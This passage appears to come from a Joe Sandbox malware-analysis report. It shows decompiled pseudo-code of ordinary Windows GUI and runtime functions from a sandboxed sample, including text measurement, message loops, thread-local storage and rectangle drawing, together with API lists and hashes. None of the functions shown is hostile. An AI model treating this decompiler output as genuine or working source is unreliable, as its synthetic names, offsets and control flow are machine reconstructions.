                                            				 *(_t91 - 4) = 0;
                                            				 *(_t91 - 0x14) = 0;
                                            				if(_t88 != 0) {
                                            					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
                                            				}
                                            				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
                                            				 *(_t91 - 0x10) = 0;
                                            				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
                                            					L15:
                                            					if( *(_t91 - 0x14) != 0) {
                                            						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
                                            					}
                                            					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                            					E0041A3DB(_t91 - 0x38);
                                            					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
                                            					goto L18;
                                            				} else {
                                            					_t14 = _t86 + 0x10; // 0x10
                                            					_t90 = _t14;
                                            					do {
                                            						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
                                            						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                            						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
                                            						_t100 = _t58;
                                            						 *_t86 = _t58;
                                            						if(_t58 == 0) {
                                            							_t59 = GetSystemMetrics(0);
                                            							asm("cdq");
                                            							_t77 = 4;
                                            							__eflags =  *(_t91 - 0x10);
                                            							 *(_t90 - 0xc) = _t59 / _t77;
                                            							if(__eflags == 0) {
                                            								_t33 = _t90 - 8;
                                            								 *_t33 =  *(_t90 - 8) | 0x08000100;
                                            								__eflags =  *_t33;
                                            							}
                                            							goto L12;
                                            						}
                                            						if(E00417214(_t90, _t100, _t58) == 0) {
                                            							L14:
                                            							 *((intOrPtr*)(_t91 - 0x18)) = 0;
                                            							goto L15;
                                            						}
                                            						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
                                            						 *(_t90 - 0xc) =  *(_t91 - 0x24);
                                            						_push(0);
                                            						_push( *_t90);
                                            						_push( *(_t91 - 0x10));
                                            						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
                                            							goto L14;
                                            						}
                                            						L12:
                                            						_t86 = _t86 + 0x14;
                                            						_t90 =  &(_t90[5]);
                                            						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
                                            					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
                                            					goto L15;
                                            				}
                                            			}














                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00424E03
                                            • SendMessageA.USER32(0000E800,00000031,00000000,00000000), ref: 00424E3E
                                              • Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
                                              • Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397
                                            • SelectObject.GDI32(?,00000000), ref: 00424E5D
                                            • GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
                                            • GetSystemMetrics.USER32 ref: 00424EC7
                                            • SelectObject.GDI32(?,?), ref: 00424F04
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
                                            • String ID:
                                            • API String ID: 3673216194-0
                                            • Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
                                            • Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
                                            • Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
                                            • Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00420341(void* __ecx, intOrPtr __edx) {
                                            				intOrPtr _v8;
                                            				struct tagMSG _v32;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t35;
                                            				void* _t37;
                                            				intOrPtr* _t38;
                                            				void* _t42;
                                            				void* _t44;
                                            				intOrPtr _t55;
                                            				void* _t56;
                                            				void* _t57;
                                            				void* _t59;
                                            				void* _t60;
                                            				void* _t61;
                                            				intOrPtr* _t62;
                                            
                                            				_t58 = __edx;
                                            				_t59 = GetCapture;
                                            				_t60 = __ecx;
                                            				if(GetCapture() != 0) {
                                            					L20:
                                            					return 0;
                                            				}
                                            				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                            				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                            					L19:
                                            					E00420031(_t60, _t72);
                                            					goto L20;
                                            				} else {
                                            					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                            						_t31 = _v32.message - 0x100;
                                            						if(_t31 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                            								E0041FA60(_t60, _v32.wParam, 1);
                                            							}
                                            							__eflags = _v32.wParam - 0x1b;
                                            							if(__eflags != 0) {
                                            								L18:
                                            								_t33 = E00413740(_t61, GetCapture());
                                            								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
                                            								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L19;
                                            						}
                                            						_t35 = _t31 - 1;
                                            						if(_t35 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							if(__eflags != 0) {
                                            								E0041FA60(_t60, _v32.wParam, 0);
                                            							}
                                            							goto L18;
                                            						}
                                            						_t37 = _t35 - 0xff;
                                            						if(_t37 == 0) {
                                            							_t55 = _v32.pt;
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							_t58 = _v8;
                                            							_push(_t55);
                                            							_push(_t55);
                                            							_t38 = _t62;
                                            							 *_t38 = _t55;
                                            							 *((intOrPtr*)(_t38 + 4)) = _v8;
                                            							_t56 = _t60;
                                            							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                            								E0041FCEC(_t56, _t59);
                                            							} else {
                                            								E0041F9E4(_t56);
                                            							}
                                            							goto L18;
                                            						}
                                            						_t42 = _t37;
                                            						if(_t42 == 0) {
                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                            							_t57 = _t60;
                                            							if(__eflags == 0) {
                                            								E0041FE54(_t61, __eflags);
                                            							} else {
                                            								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
                                            							}
                                            							_t44 = 1;
                                            							return _t44;
                                            						}
                                            						if(_t42 == 0) {
                                            							goto L19;
                                            						}
                                            						DispatchMessageA( &_v32);
                                            						goto L18;
                                            					}
                                            					E00429977(_v32.wParam);
                                            					goto L19;
                                            				}
                                            			}























                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Capture$Message$Dispatch
                                            • String ID:
                                            • API String ID: 3654672037-0
                                            • Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
                                            • Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
                                            • Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
                                            • Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
                                            				void* _v8;
                                            				void* __ebp;
                                            				void* _t28;
                                            				void* _t32;
                                            				void* _t33;
                                            				void* _t39;
                                            				signed int* _t45;
                                            				void* _t58;
                                            				long* _t61;
                                            
                                            				_push(__ecx);
                                            				_t61 = __ecx;
                                            				_t58 = TlsGetValue( *__ecx);
                                            				if(_t58 == 0) {
                                            					_t28 = E00425860(0x10);
                                            					if(_t28 == 0) {
                                            						_t58 = 0;
                                            					} else {
                                            						 *_t28 = 0x42e2ac;
                                            						_t58 = _t28;
                                            					}
                                            					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
                                            					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
                                            					_t8 = _t58 + 8; // 0x8
                                            					_t45 = _t8;
                                            					_t9 =  &(_t61[7]); // 0x4399c8
                                            					_v8 = _t58;
                                            					EnterCriticalSection(_t9);
                                            					_t11 =  &(_t61[5]); // 0x4399c0
                                            					_t48 = _t11;
                                            					E00425807(_t11, _t58);
                                            					_t12 =  &(_t61[7]); // 0x4399c8
                                            					LeaveCriticalSection(_t12);
                                            					goto L8;
                                            				} else {
                                            					_t2 = _t58 + 8; // 0x8
                                            					_t45 = _t2;
                                            					if(_a4 >=  *_t45 && _a8 != 0) {
                                            						L8:
                                            						_t32 =  *(_t58 + 0xc);
                                            						if(_t32 != 0) {
                                            							_t15 =  &(_t61[3]); // 0x4
                                            							_t48 =  *_t15 << 2;
                                            							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
                                            						} else {
                                            							_t14 =  &(_t61[3]); // 0x4
                                            							_t33 = LocalAlloc(0,  *_t14 << 2);
                                            						}
                                            						 *(_t58 + 0xc) = _t33;
                                            						if(_t33 == 0) {
                                            							E0041007F(_t48);
                                            						}
                                            						_t17 =  &(_t61[3]); // 0x4
                                            						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
                                            						_t21 =  &(_t61[3]); // 0x4
                                            						 *_t45 =  *_t21;
                                            						TlsSetValue( *_t61, _t58);
                                            					}
                                            				}
                                            				_t39 =  *(_t58 + 0xc);
                                            				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
                                            				return _t39;
                                            			}













                                            APIs
                                            • TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
                                            • EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
                                            • LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
                                            • LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
                                            • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
                                            • TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                            • String ID:
                                            • API String ID: 4117633390-0
                                            • Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
                                            • Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
                                            • Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
                                            • Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0041445E(intOrPtr* __ecx, void* __edi) {
                                            				struct HWND__* _t33;
                                            				int _t35;
                                            				void* _t37;
                                            				void* _t52;
                                            				void* _t53;
                                            				intOrPtr* _t57;
                                            				void* _t58;
                                            				void* _t60;
                                            
                                            				_t53 = __edi;
                                            				E00406520(E00429E3C, _t60);
                                            				_push(__ecx);
                                            				_t57 = __ecx;
                                            				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
                                            				E00424BFB();
                                            				E00412F19();
                                            				 *(_t60 - 4) = 0;
                                            				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
                                            					 *((intOrPtr*)( *_t57 + 0xf0))();
                                            				}
                                            				_push(_t53);
                                            				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
                                            				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
                                            				_t48 = _t57;
                                            				_t58 = E00414CEF(_t57);
                                            				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
                                            				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
                                            				_t33 = GetCapture();
                                            				if(_t33 != 0) {
                                            					SendMessageA(_t33, 0x1f, 0, 0);
                                            				}
                                            				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
                                            				_t65 = _t35;
                                            				if(_t35 == 0) {
                                            					_push(0xffffffff);
                                            					_push(0);
                                            					_push(0xf107);
                                            					E0041BB7E(_t48, _t65);
                                            				}
                                            				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
                                            				E00424BFB();
                                            				_t37 = E00412F2E();
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
                                            				return _t37;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00414463
                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144B0
                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144D2
                                            • GetCapture.USER32 ref: 004144E4
                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004144F3
                                            • WinHelpA.USER32 ref: 00414507
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSend$CaptureH_prologHelp
                                            • String ID:
                                            • API String ID: 432264411-0
                                            • Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
                                            • Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
                                            • Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
                                            • Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
                                            				struct tagRECT _v20;
                                            				struct HBRUSH__* _t46;
                                            				long _t50;
                                            				struct HBRUSH__* _t52;
                                            				intOrPtr _t59;
                                            				struct HBRUSH__* _t60;
                                            				long _t64;
                                            				struct HBRUSH__* _t66;
                                            				intOrPtr _t70;
                                            				intOrPtr _t72;
                                            
                                            				CopyRect( &_v20, _a8);
                                            				_v20.right = _v20.left + _a12;
                                            				_t46 = _a20;
                                            				if(_t46 != 0) {
                                            					_t46 =  *(_t46 + 4);
                                            				}
                                            				_t72 = _a4;
                                            				FillRect( *(_t72 + 4),  &_v20, _t46);
                                            				_t50 = _a8->right;
                                            				_v20.right = _t50;
                                            				_v20.left = _t50 - _a12;
                                            				_t52 = _a20;
                                            				if(_t52 != 0) {
                                            					_t52 =  *(_t52 + 4);
                                            				}
                                            				FillRect( *(_t72 + 4),  &_v20, _t52);
                                            				CopyRect( &_v20, _a8);
                                            				_t70 = _a16;
                                            				_v20.bottom = _v20.top + _t70;
                                            				_t59 = _a12;
                                            				_v20.left = _v20.left + _t59;
                                            				_v20.right = _v20.right - _t59;
                                            				_t60 = _a20;
                                            				if(_t60 != 0) {
                                            					_t60 =  *(_t60 + 4);
                                            				}
                                            				FillRect( *(_t72 + 4),  &_v20, _t60);
                                            				_t64 = _a8->bottom;
                                            				_v20.bottom = _t64;
                                            				_v20.top = _t64 - _t70;
                                            				_t66 = _a20;
                                            				if(_t66 != 0) {
                                            					_t66 =  *(_t66 + 4);
                                            				}
                                            				return FillRect( *(_t72 + 4),  &_v20, _t66);
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Fill$Copy
                                            • String ID:
                                            • API String ID: 4194453840-0
                                            • Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
                                            • Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
                                            • Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
                                            • Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041CD49(void* __ecx, void* __eflags) {
                                            				void* _t57;
                                            				void* _t75;
                                            				void* _t77;
                                            
                                            				E00406520(E0042A90C, _t77);
                                            				_t75 = __ecx;
                                            				_push(__ecx);
                                            				E0041A41D(_t77 - 0x40, __eflags);
                                            				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                            				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
                                            				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
                                            				E0041A2F1(_t75, _t77 - 0x1c);
                                            				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                                            				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
                                            				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                                            				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
                                            				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
                                            				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
                                            				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
                                            				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                            				_t57 = E0041A48F(_t77 - 0x40);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                                            				return _t57;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041EE8E
                                              • Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
                                              • Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B
                                            • GetClientRect.USER32 ref: 0041EEAE
                                            • GetWindowRect.USER32 ref: 0041EEBB
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E
                                            • OffsetRect.USER32(?,?,?), ref: 0041EEE2
                                              • Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
                                              • Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175
                                            • OffsetRect.USER32(?,?,?), ref: 0041EF00
                                              • Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
                                              • Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7
                                            • SendMessageA.USER32(?,00000014,?,00000000), ref: 0041EF27
                                              • Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
                                              • Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                            • String ID:
                                            • API String ID: 2727942566-0
                                            • Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
                                            • Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
                                            • Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
                                            • Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                                            				void* _v8;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				struct tagRECT _v36;
                                            				struct HDC__* _v48;
                                            				struct HDC__* _v52;
                                            				char _v56;
                                            				struct tagTEXTMETRICA _v112;
                                            				void* __ebp;
                                            				void* _t28;
                                            				int _t38;
                                            				intOrPtr* _t43;
                                            				intOrPtr _t55;
                                            				intOrPtr* _t56;
                                            				intOrPtr _t57;
                                            
                                            				_t56 = __ecx;
                                            				_push(0);
                                            				E0041A369( &_v56, __eflags);
                                            				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                            				_v8 = 0;
                                            				if(_t28 != 0) {
                                            					_v8 = SelectObject(_v52, _t28);
                                            				}
                                            				GetTextMetricsA(_v48,  &_v112);
                                            				_t63 = _v8;
                                            				if(_v8 != 0) {
                                            					SelectObject(_v52, _v8);
                                            				}
                                            				E0041A3DB( &_v56);
                                            				SetRectEmpty( &_v36);
                                            				E00424F9B(_t56, _t63,  &_v36, _a12);
                                            				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
                                            				_t38 = GetSystemMetrics(6);
                                            				_t57 =  *((intOrPtr*)(_t56 + 0x78));
                                            				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
                                            				if(_t55 < _t57) {
                                            					_t55 = _t57;
                                            				}
                                            				_t43 = _a4;
                                            				 *_t43 = 0x7fff;
                                            				 *((intOrPtr*)(_t43 + 4)) = _t55;
                                            				return _t43;
                                            			}

                                            APIs
                                              • Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
                                              • Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397
                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041BDE4
                                            • SelectObject.GDI32(?,00000000), ref: 0041BDFB
                                            • GetTextMetricsA.GDI32(?,?), ref: 0041BE07
                                            • SelectObject.GDI32(?,?), ref: 0041BE18
                                            • SetRectEmpty.USER32(?), ref: 0041BE26
                                            • GetSystemMetrics.USER32 ref: 0041BE5B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
                                            • String ID:
                                            • API String ID: 1789613188-0
                                            • Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
                                            • Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
                                            • Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
                                            • Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
                                            				struct HWND__* _t6;
                                            				void* _t12;
                                            				struct HWND__** _t14;
                                            				struct HWND__* _t15;
                                            				struct HWND__* _t16;
                                            				struct HWND__* _t17;
                                            
                                            				_t17 = _a4;
                                            				_t16 = _t17;
                                            				if(_t17 != 0) {
                                            					L16:
                                            					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
                                            						L4:
                                            						_t15 = _t16;
                                            						_t6 = _t16;
                                            						if(_t16 == 0) {
                                            							L6:
                                            							if(_t17 == 0 && _t16 != 0) {
                                            								_t16 = GetLastActivePopup(_t16);
                                            							}
                                            							_t14 = _a8;
                                            							if(_t14 != 0) {
                                            								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
                                            									 *_t14 =  *_t14 & 0x00000000;
                                            								} else {
                                            									 *_t14 = _t15;
                                            									EnableWindow(_t15, 0);
                                            								}
                                            							}
                                            							return _t16;
                                            						} else {
                                            							goto L5;
                                            						}
                                            						do {
                                            							L5:
                                            							_t15 = _t6;
                                            							_t6 = GetParent(_t6);
                                            						} while (_t6 != 0);
                                            						goto L6;
                                            					}
                                            					_t16 = GetParent(_t16);
                                            					L15:
                                            					if(_t16 == 0) {
                                            						goto L4;
                                            					}
                                            					goto L16;
                                            				}
                                            				_t12 = E0041BC73();
                                            				if(_t12 != 0) {
                                            					L14:
                                            					_t16 =  *(_t12 + 0x1c);
                                            					goto L15;
                                            				}
                                            				_t12 = E00404DAE();
                                            				if(_t12 != 0) {
                                            					goto L14;
                                            				}
                                            				_t16 = 0;
                                            				goto L4;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
